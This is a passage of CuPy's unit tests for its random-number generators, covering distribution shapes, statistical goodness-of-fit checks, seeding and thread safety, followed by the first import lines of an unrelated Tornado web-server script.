cupy.cuda.curand.CURAND_RNG_PSEUDO_MT19937,
cupy.cuda.curand.CURAND_RNG_PSEUDO_PHILOX4_32_10,
cupy.cuda.curand.CURAND_RNG_PSEUDO_MTGP32,
cupy.cuda.curand.CURAND_RNG_PSEUDO_XORWOW
]
for method in methods:
if (runtime.is_hip and
method == cupy.cuda.curand.CURAND_RNG_PSEUDO_MT19937):
# hipRAND fails for MT19937 with the status code 1000,
# HIPRAND_STATUS_NOT_IMPLEMENTED. We use `pytest.raises` here
# so that we will be able to find it once hipRAND implement
# MT19937 as the imperative `pytest.xfail` immediately rewinds
# the control flow and does not run the test.
with pytest.raises(KeyError) as e:
rs = cupy.random.RandomState(method=method)
assert e.value.args == (1000,)
continue
rs = cupy.random.RandomState(method=method)
rs.normal()
@testing.parameterize(*common_distributions.beta_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestBeta(
common_distributions.Beta,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'n': 5, 'p': 0.5},
{'n': 5, 'p': 0.0},
{'n': 5, 'p': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestBinomial(RandomGeneratorTestCase):
# TODO(niboshi):
# Test soundness of distribution.
# Currently only reprocibility is checked.
target_method = 'binomial'
def test_binomial(self):
self.generate(n=self.n, p=self.p, size=(3, 2))
@testing.parameterize(
{'df': 1.0},
{'df': 3.0},
{'df': 10.0},
)
@testing.gpu
@testing.fix_random()
class TestChisquare(RandomGeneratorTestCase):
target_method = 'chisquare'
def test_chisquare(self):
self.generate(df=self.df, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_chisquare_ks(self, dtype):
self.check_ks(0.05)(
df=self.df, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(
{'alpha': cupy.array([1.0, 1.0, 1.0])},
{'alpha': cupy.array([1.0, 3.0, 5.0])},
)
@testing.fix_random()
class TestDirichlet(RandomGeneratorTestCase):
target_method = 'dirichlet'
def test_dirichlet(self):
self.generate(alpha=self.alpha, size=(3, 2, 3))
def test_dirichlet_int_shape(self):
self.generate(alpha=self.alpha, size=5)
# TODO(kataoka): add distribution test
@testing.parameterize(*common_distributions.exponential_params)
@testing.gpu
@testing.fix_random()
class TestExponential(
common_distributions.Exponential,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'dfnum': 1.0, 'dfden': 3.0},
{'dfnum': 3.0, 'dfden': 3.0},
{'dfnum': 3.0, 'dfden': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestF(RandomGeneratorTestCase):
target_method = 'f'
def test_f(self):
self.generate(dfnum=self.dfnum, dfden=self.dfden, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_f_ks(self, dtype):
self.check_ks(0.05)(
self.dfnum, self.dfden, size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.gamma_params)
@testing.gpu
@testing.fix_random()
class TestGamma(
common_distributions.Gamma,
RandomGeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.geometric_params)
@testing.fix_random()
class TestGeometric(
common_distributions.Geometric,
RandomGeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.hypergeometric_params)
@testing.fix_random()
class TestHypergeometric(
common_distributions.Hypergeometric,
RandomGeneratorTestCase
):
pass
@testing.gpu
@testing.fix_random()
class TestLaplace(RandomGeneratorTestCase):
target_method = 'laplace'
def test_laplace_1(self):
self.generate()
def test_laplace_2(self):
self.generate(0.0, 1.0, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_laplace_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_laplace_ks_2(self, dtype):
self.check_ks(0.05)(
2.3, 4.5, size=2000, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestLogistic(RandomGeneratorTestCase):
target_method = 'logistic'
def test_logistic_1(self):
self.generate()
def test_logistic_2(self):
self.generate(0.0, 1.0, size=(3, 2))
@_attr.slow
@_condition.repeat(10)
def test_standard_logistic_isfinite(self):
x = self.generate(size=10**7)
assert cupy.isfinite(x).all()
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_logistic_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_logistic_ks_2(self, dtype):
self.check_ks(0.05)(
2.3, 4.5, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(*[
{'args': (0.0, 1.0), 'size': None},
{'args': (10.0, 20.0), 'size': None},
{'args': (0.0, 1.0), 'size': 10},
{'args': (0.0, 1.0), 'size': (1, 2, 3)},
{'args': (0.0, 1.0), 'size': 3},
{'args': (0.0, 1.0), 'size': (3, 3)},
{'args': (0.0, 1.0), 'size': ()},
])
@testing.fix_random()
class TestLogNormal(RandomGeneratorTestCase):
target_method = 'lognormal'
def check_lognormal(self, dtype):
vals = self.generate_many(
self.args[0], self.args[1], self.size, dtype, _count=10)
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape
assert (0 <= val).all()
def test_lognormal_float(self):
self.check_lognormal(float)
def test_lognormal_float32(self):
self.check_lognormal(numpy.float32)
def test_lognormal_float64(self):
self.check_lognormal(numpy.float64)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_lognormal_ks(self, dtype):
self.check_ks(0.05)(
*self.args, size=self.size, dtype=dtype)
@testing.parameterize(
{'p': 0.5},
{'p': 0.1},
{'p': 0.9},
)
@testing.gpu
@testing.fix_random()
class TestLogseries(RandomGeneratorTestCase):
target_method = 'logseries'
def test_logseries(self):
self.generate(p=self.p, size=(3, 2))
# TODO(kataoka): add distribution test
@testing.gpu
@testing.parameterize(*[
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': None, 'tol': 1e-6},
{'args': ([10., 10.], [[20., 10.], [10., 20.]]),
'size': None, 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': 10, 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': (1, 2, 3), 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': 3, 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': (3, 3), 'tol': 1e-6},
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': (), 'tol': 1e-6},
])
@testing.fix_random()
class TestMultivariateNormal(RandomGeneratorTestCase):
target_method = 'multivariate_normal'
def check_multivariate_normal(self, dtype):
vals = self.generate_many(
mean=self.args[0], cov=self.args[1], size=self.size, tol=self.tol,
dtype=dtype, _count=10)
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape + (2,)
def test_multivariate_normal_float32(self):
self.check_multivariate_normal(numpy.float32)
def test_multivariate_normal_float64(self):
self.check_multivariate_normal(numpy.float64)
# TODO(kataoka): add distribution test
@testing.parameterize(
{'n': 5, 'p': 0.5},
)
@testing.gpu
@testing.fix_random()
class TestNegativeBinomial(RandomGeneratorTestCase):
target_method = 'negative_binomial'
def test_negative_binomial(self):
self.generate(n=self.n, p=self.p, size=(3, 2))
# TODO(kataoka): add distribution test
@testing.parameterize(
{'df': 1.5, 'nonc': 2.0},
{'df': 2.0, 'nonc': 0.0},
)
@testing.gpu
@testing.fix_random()
class TestNoncentralChisquare(RandomGeneratorTestCase):
target_method = 'noncentral_chisquare'
def test_noncentral_chisquare(self):
self.generate(df=self.df, nonc=self.nonc, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_noncentral_chisquare_ks(self, dtype):
self.check_ks(0.05)(
self.df, self.nonc, size=2000, dtype=dtype)
@testing.parameterize(
{'dfnum': 2.0, 'dfden': 3.0, 'nonc': 4.0},
{'dfnum': 2.5, 'dfden': 1.5, 'nonc': 0.0},
)
@testing.gpu
@testing.fix_random()
class TestNoncentralF(RandomGeneratorTestCase):
target_method = 'noncentral_f'
def test_noncentral_f(self):
self.generate(
dfnum=self.dfnum, dfden=self.dfden, nonc=self.nonc, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_noncentral_f_ks(self, dtype):
self.check_ks(0.05)(
self.dfnum, self.dfden, self.nonc, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(*[
{'args': (0.0, 1.0), 'size': None},
{'args': (10.0, 20.0), 'size': None},
{'args': (0.0, 1.0), 'size': 10},
{'args': (0.0, 1.0), 'size': (1, 2, 3)},
{'args': (0.0, 1.0), 'size': 3},
{'args': (0.0, 1.0), 'size': (3, 3)},
{'args': (0.0, 1.0), 'size': ()},
])
@testing.fix_random()
class TestNormal(RandomGeneratorTestCase):
target_method = 'normal'
def check_normal(self, dtype):
vals = self.generate_many(
self.args[0], self.args[1], self.size, dtype, _count=10)
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape
def test_normal_float32(self):
self.check_normal(numpy.float32)
def test_normal_float64(self):
self.check_normal(numpy.float64)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_normal_ks(self, dtype):
self.check_ks(0.05)(
*self.args, size=self.size, dtype=dtype)
@testing.parameterize(
{'a': 1.0},
{'a': 3.0},
{'a': 10.0},
)
@testing.gpu
@testing.fix_random()
class TestPareto(RandomGeneratorTestCase):
target_method = 'pareto'
def test_pareto(self):
self.generate(a=self.a, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_pareto_ks(self, dtype):
self.check_ks(0.05)(
a=self.a, size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.poisson_params)
@testing.gpu
@testing.fix_random()
class TestPoisson(
common_distributions.Poisson,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'df': 1.0},
{'df': 3.0},
{'df': 10.0},
)
@testing.gpu
@testing.fix_random()
class TestStandardT(RandomGeneratorTestCase):
target_method = 'standard_t'
def test_standard_t(self):
self.generate(df=self.df, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_standard_t_ks(self, dtype):
self.check_ks(0.05)(
df=self.df, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(*[
{'size': None},
{'size': 10},
{'size': (1, 2, 3)},
{'size': 3},
{'size': ()},
])
@testing.fix_random()
class TestRandomSample(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def check_random_sample(self, dtype):
vals = [self.rs.random_sample(self.size, dtype) for _ in range(10)]
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape
assert (0 <= val).all()
assert (val < 1).all()
def test_random_sample_float32(self):
self.check_random_sample(numpy.float32)
def test_random_sample_float64(self):
self.check_random_sample(numpy.float64)
@testing.fix_random()
class TestRandomSampleDistrib(unittest.TestCase):
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
@numpy_cupy_equal_continuous_distribution(0.05)
def test_random_sample_ks(self, xp, dtype):
return _xp_random(xp, 'random_sample')(size=2000, dtype=dtype)
@testing.fix_random()
@testing.gpu
class TestRandAndRandN(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def test_rand_invalid_argument(self):
with self.assertRaises(TypeError):
self.rs.rand(1, 2, 3, unnecessary='unnecessary_argument')
def test_randn_invalid_argument(self):
with self.assertRaises(TypeError):
self.rs.randn(1, 2, 3, unnecessary='unnecessary_argument')
@testing.parameterize(
{'a': 0.5},
)
@testing.gpu
@testing.fix_random()
class TestPower(RandomGeneratorTestCase):
target_method = 'power'
def test_power(self):
self.generate(a=self.a, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_power_ks(self, dtype):
self.check_ks(0.05)(
a=self.a, size=2000, dtype=dtype)
@testing.parameterize(
{'scale': 1.0},
{'scale': 3.0},
)
@testing.gpu
@testing.fix_random()
class TestRayleigh(RandomGeneratorTestCase):
target_method = 'rayleigh'
def test_rayleigh(self):
self.generate(scale=self.scale, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_rayleigh_ks(self, dtype):
self.check_ks(0.05)(
scale=self.scale, size=2000, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestStandardCauchy(RandomGeneratorTestCase):
target_method = 'standard_cauchy'
def test_standard_cauchy(self):
self.generate(size=(3, 2))
@_attr.slow
@_condition.repeat(10)
def test_standard_cauchy_isfinite(self):
x = self.generate(size=10**7)
assert cupy.isfinite(x).all()
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_standard_cauchy_ks(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.standard_gamma_params)
@testing.gpu
@testing.fix_random()
class TestStandardGamma(
common_distributions.StandardGamma,
RandomGeneratorTestCase
):
pass
@testing.fix_random()
@testing.gpu
class TestInterval(RandomGeneratorTestCase):
target_method = '_interval'
def test_zero(self):
shape = (2, 3)
vals = self.generate_many(0, shape, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == shape
assert (val == 0).all()
def test_shape_zero(self):
mx = 10
vals = self.generate_many(mx, None, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == ()
assert (0 <= val).all()
assert (val <= mx).all()
# TODO(niboshi): Distribution test
def test_shape_one_dim(self):
mx = 10
size = 20
vals = self.generate_many(mx, size, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == (size,)
assert (0 <= val).all()
assert (val <= mx).all()
# TODO(niboshi): Distribution test
def test_shape_multi_dim(self):
mx = 10
shape = (1, 2)
vals = self.generate_many(mx, shape, _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == shape
assert (0 <= val).all()
assert (val <= mx).all()
# TODO(niboshi): Distribution test
def test_bound_1(self):
vals = self.generate_many(10, (2, 3), _count=10)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == (2, 3)
assert (0 <= val).all()
assert (val <= 10).all()
def test_bound_2(self):
vals = self.generate_many(2, None, _count=20)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype.kind in 'iu'
assert val.shape == ()
assert (0 <= val).all()
assert (val <= 2).all()
@_condition.repeat(3, 10)
def test_goodness_of_fit(self):
mx = 5
trial = 300
vals = self.generate_many(mx, None, _count=trial)
vals = [val.get() for val in vals]
counts = numpy.histogram(vals, bins=numpy.arange(mx + 2))[0]
expected = numpy.array([float(trial) / (mx + 1)] * (mx + 1))
assert _hypothesis.chi_square_test(counts, expected)
@_condition.repeat(3)
def test_goodness_of_fit_2(self):
mx = 5
vals = self.generate(mx, (5, 5)).get()
counts = numpy.histogram(vals, bins=numpy.arange(mx + 2))[0]
expected = numpy.array([float(vals.size) / (mx + 1)] * (mx + 1))
assert _hypothesis.chi_square_test(counts, expected)
@testing.fix_random()
@testing.gpu
class TestTomaxint(RandomGeneratorTestCase):
target_method = 'tomaxint'
def test_tomaxint_none(self):
x = self.generate()
assert x.shape == ()
assert (0 <= x).all()
assert (x <= cupy.iinfo(cupy.int_).max).all()
def test_tomaxint_int(self):
x = self.generate(3)
assert x.shape == (3,)
assert (0 <= x).all()
assert (x <= cupy.iinfo(cupy.int_).max).all()
def test_tomaxint_tuple(self):
x = self.generate((2, 3))
assert x.shape == (2, 3)
assert (0 <= x).all()
assert (x <= cupy.iinfo(cupy.int_).max).all()
@testing.parameterize(
{'a': 3, 'size': 2, 'p': None},
{'a': 3, 'size': 2, 'p': [0.3, 0.3, 0.4]},
{'a': 3, 'size': (5, 5), 'p': [0.3, 0.3, 0.4]},
{'a': 3, 'size': (5, 5), 'p': numpy.array([0.3, 0.3, 0.4])},
{'a': 3, 'size': (), 'p': None},
{'a': numpy.array([0.0, 1.0, 2.0]), 'size': 2, 'p': [0.3, 0.3, 0.4]},
{'a': 0, 'size': 0, 'p': None},
{'a': numpy.array([]), 'size': 0, 'p': None},
)
@testing.fix_random()
@testing.gpu
class TestChoice1(RandomGeneratorTestCase):
target_method = 'choice'
def test_dtype_shape(self):
v = self.generate(a=self.a, size=self.size, p=self.p)
if isinstance(self.size, int):
expected_shape = (self.size,)
else:
expected_shape = self.size
if isinstance(self.a, numpy.ndarray):
expected_dtype = 'float'
else:
expected_dtype = 'int64'
assert v.dtype == expected_dtype
assert v.shape == expected_shape
@_condition.repeat(3, 10)
def test_bound(self):
vals = self.generate_many(
a=self.a, size=self.size, p=self.p, _count=20)
vals = [val.get() for val in vals]
size_ = self.size if isinstance(self.size, tuple) else (self.size,)
if size_ == (0, ):
self.skipTest('no bound check for empty `random.choice`')
for val in vals:
assert val.shape == size_
assert min(val.min() for val in vals) == 0
assert max(val.max() for val in vals) == 2
@testing.parameterize(
{'a': [0, 1, 2], 'size': 2, 'p': [0.3, 0.3, 0.4]},
)
@testing.fix_random()
@testing.gpu
class TestChoice2(RandomGeneratorTestCase):
target_method = 'choice'
def test_dtype_shape(self):
v = self.generate(a=self.a, size=self.size, p=self.p)
if isinstance(self.size, int):
expected_shape = (self.size,)
else:
expected_shape = self.size
if isinstance(self.a, numpy.ndarray):
expected_dtype = 'float'
else:
expected_dtype = 'int'
assert v.dtype == expected_dtype
assert v.shape == expected_shape
@_condition.repeat(3, 10)
def test_bound(self):
vals = self.generate_many(
a=self.a, size=self.size, p=self.p, _count=20)
vals = [val.get() for val in vals]
size_ = self.size if isinstance(self.size, tuple) else (self.size,)
for val in vals:
assert val.shape == size_
assert min(val.min() for val in vals) == 0
assert max(val.max() for val in vals) == 2
@testing.fix_random()
@testing.gpu
class TestChoiceChi(RandomGeneratorTestCase):
target_method = 'choice'
@_condition.repeat(3, 10)
def test_goodness_of_fit(self):
trial = 100
vals = self.generate_many(3, 1, True, [0.3, 0.3, 0.4], _count=trial)
vals = [val.get() for val in vals]
counts = numpy.histogram(vals, bins=numpy.arange(4))[0]
expected = numpy.array([30, 30, 40])
assert _hypothesis.chi_square_test(counts, expected)
@_condition.repeat(3, 10)
@pytest.mark.xfail(runtime.is_hip, reason='ROCm/HIP may have a bug')
def test_goodness_of_fit_2(self):
vals = self.generate(3, (5, 20), True, [0.3, 0.3, 0.4]).get()
counts = numpy.histogram(vals, bins=numpy.arange(4))[0]
expected = numpy.array([30, 30, 40])
assert _hypothesis.chi_square_test(counts, expected)
@testing.fix_random()
@testing.gpu
class TestChoiceMultinomial(unittest.TestCase):
@_condition.repeat(3, 10)
@testing.for_float_dtypes()
@testing.numpy_cupy_allclose(atol=0.02)
def test_choice_multinomial(self, xp, dtype):
p = xp.array([0.5, 0.25, 0.125, 0.125], dtype)
trial = 10000
x = xp.random.choice(len(p), trial, p=p)
y = xp.bincount(x).astype('f') / trial
return y
@testing.parameterize(
{'a': 3.1, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': None, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': -3, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': [[0, 1], [2, 3]], 'size': 1, 'p': [[0.1, 0.2], [0.3, 0.4]]},
{'a': [[0, 1], [2, 3]], 'size': 1, 'p': [0.3, 0.7]},
{'a': [], 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': 4, 'size': 1, 'p': [[0.1, 0.2], [0.3, 0.4]]},
{'a': 2, 'size': 1, 'p': [0.1, 0.1, 0.8]},
{'a': 3, 'size': 1, 'p': [-0.1, 0.3, 0.8]},
{'a': 3, 'size': 1, 'p': [0.1, 0.1, 0.7]},
)
@testing.fix_random()
@testing.gpu
class TestChoiceFailure(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def test_choice_invalid_value(self):
with self.assertRaises(ValueError):
self.rs.choice(a=self.a, size=self.size, p=self.p)
@testing.parameterize(
{'a': 5, 'size': 2},
{'a': 5, 'size': (2, 2)},
{'a': 5, 'size': ()},
{'a': numpy.array([0.0, 2.0, 4.0]), 'size': 2},
)
@testing.fix_random()
@testing.gpu
class TestChoiceReplaceFalse(RandomGeneratorTestCase):
target_method = 'choice'
def test_dtype_shape(self):
v = self.generate(a=self.a, size=self.size, replace=False)
if isinstance(self.size, int):
expected_shape = (self.size,)
else:
expected_shape = self.size
if isinstance(self.a, numpy.ndarray):
expected_dtype = 'float'
else:
expected_dtype = 'int'
assert v.dtype == expected_dtype
assert v.shape == expected_shape
@_condition.repeat(3, 10)
def test_bound(self):
val = self.generate(a=self.a, size=self.size, replace=False).get()
size = self.size if isinstance(self.size, tuple) else (self.size,)
assert val.shape == size
assert (0 <= val).all()
assert (val < 5).all()
val = numpy.asarray(val)
assert numpy.unique(val).size == val.size
@testing.gpu
@testing.fix_random()
class TestGumbel(RandomGeneratorTestCase):
target_method = 'gumbel'
def test_gumbel_1(self):
self.generate()
def test_gumbel_2(self):
self.generate(0.0, 1.0, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_gumbel_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_gumbel_ks_2(self, dtype):
self.check_ks(0.05)(
2.3, 4.5, size=2000, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestRandint(RandomGeneratorTestCase):
# TODO(niboshi):
# Test soundness of distribution.
# Currently only reprocibility is checked.
target_method = 'randint'
def test_randint_1(self):
self.generate(3)
def test_randint_2(self):
self.generate(3, 4, size=(3, 2))
def test_randint_empty1(self):
self.generate(3, 10, size=0)
def test_randint_empty2(self):
self.generate(3, size=(4, 0, 5))
def test_randint_overflow(self):
self.generate(numpy.int8(-100), numpy.int8(100))
def test_randint_float1(self):
self.generate(-1.2, 3.4, 5)
def test_randint_float2(self):
self.generate(6.7, size=(2, 3))
def test_randint_int64_1(self):
self.generate(2**34, 2**40, 3, dtype='q')
@testing.gpu
@testing.fix_random()
class TestUniform(RandomGeneratorTestCase):
target_method = 'uniform'
def test_uniform_1(self):
self.generate()
def test_uniform_2(self):
self.generate(-4.2, 2.4, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_uniform_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_uniform_ks_2(self, dtype):
self.check_ks(0.05)(
-4.2, 2.4, size=2000, dtype=dtype)
@testing.parameterize(
{'mu': 0.0, 'kappa': 1.0},
{'mu': 3.0, 'kappa': 3.0},
{'mu': 3.0, 'kappa': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestVonmises(RandomGeneratorTestCase):
target_method = 'vonmises'
def test_vonmises(self):
self.generate(mu=self.mu, kappa=self.kappa, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_vonmises_ks(self, dtype):
self.check_ks(0.05)(
self.mu, self.kappa, size=2000, dtype=dtype)
@testing.parameterize(
{'mean': 1.0, 'scale': 3.0},
{'mean': 3.0, 'scale': 3.0},
{'mean': 3.0, 'scale': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestWald(RandomGeneratorTestCase):
target_method = 'wald'
def test_wald(self):
self.generate(mean=self.mean, scale=self.scale, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_wald_ks(self, dtype):
self.check_ks(0.05)(
self.mean, self.scale, size=2000, dtype=dtype)
@testing.parameterize(
{'a': 0.5},
{'a': 1.0},
{'a': 3.0},
{'a': numpy.inf},
)
@testing.gpu
@testing.fix_random()
class TestWeibull(RandomGeneratorTestCase):
target_method = 'weibull'
def test_weibull(self):
self.generate(a=self.a, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_weibull_ks(self, dtype):
self.check_ks(0.05)(
a=self.a, size=2000, dtype=dtype)
@testing.parameterize(
{'a': 2.0},
)
@testing.gpu
@testing.fix_random()
class TestZipf(RandomGeneratorTestCase):
target_method = 'zipf'
def test_zipf(self):
self.generate(a=self.a, size=(3, 2))
# TODO(kataoka): add distribution test
@testing.parameterize(
{'a': 3, 'size': 5},
{'a': [1, 2, 3], 'size': 5},
)
@testing.fix_random()
@testing.gpu
class TestChoiceReplaceFalseFailure(unittest.TestCase):
def test_choice_invalid_value(self):
for xp in (numpy, cupy):
rs = xp.random.RandomState(seed=testing.generate_seed())
with pytest.raises(ValueError):
rs.choice(a=self.a, size=self.size, replace=False)
class TestResetStates(unittest.TestCase):
def test_reset_states(self):
_generator._random_states = 'dummy'
_generator.reset_states()
assert {} == _generator._random_states
@testing.gpu
class TestGetRandomState(unittest.TestCase):
def setUp(self):
self.device_id = cuda.Device().id
self.rs_tmp = _generator._random_states
def tearDown(self, *args):
_generator._random_states = self.rs_tmp
def test_get_random_state_initialize(self):
_generator._random_states = {}
rs = _generator.get_random_state()
assert _generator._random_states[self.device_id] == rs
def test_get_random_state_memoized(self):
_generator._random_states = {self.device_id: 'expected',
self.device_id + 1: 'dummy'}
rs = _generator.get_random_state()
assert 'expected' == _generator._random_states[self.device_id]
assert 'dummy' == _generator._random_states[self.device_id + 1]
assert 'expected' == rs
@testing.gpu
class TestSetRandomState(unittest.TestCase):
def setUp(self):
self.rs_tmp = _generator._random_states
def tearDown(self, *args):
_generator._random_states = self.rs_tmp
def test_set_random_state(self):
rs = _generator.RandomState()
_generator.set_random_state(rs)
assert _generator.get_random_state() is rs
def test_set_random_state_call_multiple_times(self):
_generator.set_random_state(_generator.RandomState())
rs = _generator.RandomState()
_generator.set_random_state(rs)
assert _generator.get_random_state() is rs
@testing.gpu
@testing.fix_random()
class TestStandardExponential(
common_distributions.StandardExponential,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'left': -1.0, 'mode': 0.0, 'right': 2.0},
)
@testing.gpu
@testing.fix_random()
class TestTriangular(RandomGeneratorTestCase):
target_method = 'triangular'
def test_triangular(self):
self.generate(
left=self.left, mode=self.mode, right=self.right, size=(3, 2))
@testing.gpu
class TestRandomStateThreadSafe(unittest.TestCase):
def setUp(self):
cupy.random.reset_states()
def test_get_random_state_thread_safe(self):
def _f(func, args=()):
cupy.cuda.Device().use()
func(*args)
seed = 10
threads = [
threading.Thread(
target=_f, args=(cupy.random.seed, (seed,))),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
threading.Thread(
target=_f, args=(cupy.random.get_random_state,)),
]
for t in threads:
t.start()
for t in threads:
t.join()
actual = cupy.random.uniform()
cupy.random.seed(seed)
expected = cupy.random.uniform()
assert actual == expected
def test_set_random_state_thread_safe(self):
def _f(func, args=()):
cupy.cuda.Device().use()
func(*args)
rs = cupy.random.RandomState()
threads = [
threading.Thread(
target=_f, args=(cupy.random.set_random_state, (rs,))),
threading.Thread(
target=_f, args=(cupy.random.set_random_state, (rs,))),
]
for t in threads:
t.start()
for t in threads:
t.join()
assert cupy.random.get_random_state() is rs
@testing.gpu
class TestGetRandomState2(unittest.TestCase):
def setUp(self):
self.rs_dict = _generator._random_states
_generator._random_states = {}
self.cupy_seed = os.getenv('CUPY_SEED')
def tearDown(self, *args):
_generator._random_states = self.rs_dict
if self.cupy_seed is None:
os.environ.pop('CUPY_SEED', None)
else:
os.environ['CUPY_SEED'] = self.cupy_seed
def test_get_random_state_no_cupy(self):
os.environ.pop('CUPY_SEED', None)
rvs0 = self._get_rvs_reset()
rvs1 = self._get_rvs_reset()
self._check_different(rvs0, rvs1)
def test_get_random_state_with_cupy(self):
rvs0 = self._get_rvs(_generator.RandomState(6))
os.environ['CUPY_SEED'] = '6'
rvs1 = self._get_rvs_reset()
self._check_same(rvs0, rvs1)
def _get_rvs(self, rs):
rvu = rs.rand(4)
rvn = rs.randn(4)
return rvu, rvn
def _get_rvs_reset(self):
_generator.reset_states()
return self._get_rvs(_generator.get_random_state())
def _check_same(self, rvs0, rvs1):
for rv0, rv1 in zip(rvs0, rvs1):
testing.assert_array_equal(rv0, rv1)
def _check_different(self, rvs0, rvs1):
for rv0, rv1 in zip(rvs0, rvs1):
for r0, r1 in zip(rv0, rv1):
assert r0 != r1
class TestCheckAndGetDtype(unittest.TestCase):
@testing.for_float_dtypes(no_float16=True)
def test_float32_64_type(self, dtype):
assert _generator._check_and_get_dtype(dtype) == numpy.dtype(dtype)
def test_float16(self):
with self.assertRaises(TypeError):
_generator._check_and_get_dtype(numpy.float16)
@testing.for_int_dtypes()
def test_int_type(self, dtype):
with self.assertRaises(TypeError):
_generator._check_and_get_dtype(dtype)
|
webserver.py
|
from ozone import create_app
from ozone.config import ProdConfigLinux, DevConfigLinux, ProdConfigWindows, DevConfigWindows, logger
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from ozone.utils.music_util import query_loop
import threading
import argparse
